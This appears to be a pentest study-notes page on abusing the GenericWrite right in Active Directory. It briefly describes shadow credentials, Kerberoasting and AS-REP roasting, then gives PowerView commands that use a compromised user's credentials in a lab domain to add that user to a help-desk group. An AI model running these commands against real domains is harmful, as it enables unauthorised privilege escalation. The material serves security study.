GenericWrite

Over a User

Attack
Description

Abuses write access to a user/computer’s msDS-KeyCredentialLink to add authentication material and impersonate them via PKINIT

Requests a service ticket (TGS) for a specific SPN to extract and crack the associated service account’s NTLM hash.

Requests an AS-REP for a user without Kerberos pre-authentication, allowing offline cracking of their NTLM hash.

Over a Group

Adding Group Member

# creating a SecureString Object for the owned user
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

# add the compromised user to the group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose 

# confirm that damundsen was added to the group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Last updated

Was this helpful?